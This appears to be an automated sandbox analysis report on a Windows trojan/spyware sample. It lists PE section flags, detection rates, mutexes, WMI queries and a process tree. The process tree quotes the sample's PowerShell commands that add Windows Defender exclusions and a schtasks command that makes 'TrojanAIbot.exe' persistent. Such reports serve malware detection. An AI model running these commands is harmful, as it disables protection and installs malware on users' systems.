Source: DiagnosticsHub.StandardCollector.Service.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: RJKUWSGxej.exe	Static PE information: Section: .rsrc ZLIB complexity 0.9996029879691565
Source: RJKUWSGxej.exe.0.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9996029879691565

Source: firefox.exe.7.dr	Binary string: ntdll.dll\Device\\Device\HarddiskVolume
Source: firefox.exe.7.dr	Binary string: \Device\\??\

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@37/148@61/21

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Code function: 0_2_00007FF6C7501830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF6C7501830

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Code function: 5_2_0317CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

5_2_0317CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

File created: C:\Users\user\RJKUWSGxej.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-3b4327877d6689f9ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3b4327877d6689f7d8e3ee9-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3b4327877d6689f-inf

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4epfqf5y.ttm.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RJKUWSGxej.exe	ReversingLabs: Detection: 70%
Source: RJKUWSGxej.exe	Virustotal: Detection: 75%

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

File read: C:\Users\user\Desktop\RJKUWSGxej.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_5-8657

Source: unknown	Process created: C:\Users\user\Desktop\RJKUWSGxej.exe "C:\Users\user\Desktop\RJKUWSGxej.exe"
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
